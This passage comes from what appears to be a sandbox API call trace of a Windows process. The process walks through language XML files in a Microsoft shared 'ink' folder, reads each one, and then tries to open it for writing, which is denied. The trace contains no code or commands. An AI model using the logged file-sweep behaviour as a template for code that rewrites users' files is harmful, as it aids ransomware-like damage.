(HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0099.896] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.896] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0099.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0099.896] AreFileApisANSI () returned 1 [0099.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0099.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e2d8 [0099.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e2d8, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml") returned 62 [0099.896] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.896] GetFileType (hFile=0x368) returned 0x1 [0099.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0099.896] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.897] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.897] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.897] CloseHandle (hObject=0x368) returned 1 [0099.897] AreFileApisANSI () returned 1 [0099.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0099.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e828 [0099.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e828, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml") returned 62 [0099.897] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.897] GetLastError () returned 0x5 [0099.897] GetLastError () returned 0x5 [0099.897] SetLastError (dwErrCode=0x5) [0099.897] GetLastError () returned 0x5 [0099.897] SetLastError (dwErrCode=0x5) [0099.897] GetLastError () returned 0x5 [0099.898] SetLastError (dwErrCode=0x5) [0099.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0099.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0099.898] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.898] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.898] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa38, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ipsdeu.xml", cAlternateFileName="")) returned 1 [0099.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0099.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0099.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0099.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0099.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0099.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0099.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0099.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0099.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0099.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0099.898] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.898] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.898] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.898] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0099.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.899] AreFileApisANSI () returned 1 [0099.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml", lpUsedDefaultChar=0x0) returned 62 [0099.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0099.899] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.899] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0099.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.899] AreFileApisANSI () returned 1 [0099.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0099.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e030 [0099.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6e030, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml") returned 62 [0099.899] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.899] GetFileType (hFile=0x368) returned 0x1 [0099.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0099.899] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.899] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.900] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.900] CloseHandle (hObject=0x368) returned 1 [0099.900] AreFileApisANSI () returned 1 [0099.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0099.900] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e580 [0099.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6e580, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml") returned 62 [0099.900] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.900] GetLastError () returned 0x5 [0099.900] GetLastError () returned 0x5 [0099.900] SetLastError (dwErrCode=0x5) [0099.900] GetLastError () returned 0x5 [0099.900] SetLastError (dwErrCode=0x5) [0099.900] GetLastError () returned 0x5 [0099.900] SetLastError (dwErrCode=0x5) [0099.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0099.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0099.901] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.901] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.901] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa3a, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ipsel.xml", cAlternateFileName="")) returned 1 [0099.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0099.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0099.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0099.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0099.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0099.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fe78 [0099.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0099.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0099.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fe78 | out: hHeap=0x20000) returned 1 [0099.901] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.901] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.901] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.901] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0099.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.902] AreFileApisANSI () returned 1 [0099.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml", lpUsedDefaultChar=0x0) returned 61 [0099.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0099.902] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.902] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0099.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.902] AreFileApisANSI () returned 1 [0099.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0099.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6e360 [0099.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e360, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml") returned 61 [0099.902] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsel.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.902] GetFileType (hFile=0x368) returned 0x1 [0099.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0099.902] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.902] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.903] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.903] CloseHandle (hObject=0x368) returned 1 [0099.903] AreFileApisANSI () returned 1 [0099.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0099.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6e7a0 [0099.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e7a0, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml") returned 61 [0099.903] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsel.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.903] GetLastError () returned 0x5 [0099.903] GetLastError () returned 0x5 [0099.903] SetLastError (dwErrCode=0x5) [0099.903] GetLastError () returned 0x5 [0099.903] SetLastError (dwErrCode=0x5) [0099.903] GetLastError () returned 0x5 [0099.903] SetLastError (dwErrCode=0x5) [0099.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0099.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0099.904] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.904] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.904] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa12, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ipsen.xml", cAlternateFileName="")) returned 1 [0099.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0099.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0099.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0099.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0099.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0099.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0099.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0099.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0099.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0099.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0099.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0099.904] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.904] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.904] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.904] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0099.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0099.904] AreFileApisANSI () returned 1 [0099.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml", lpUsedDefaultChar=0x0) returned 61 [0099.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0099.905] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.905] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0099.905] RtlAllocateHeap 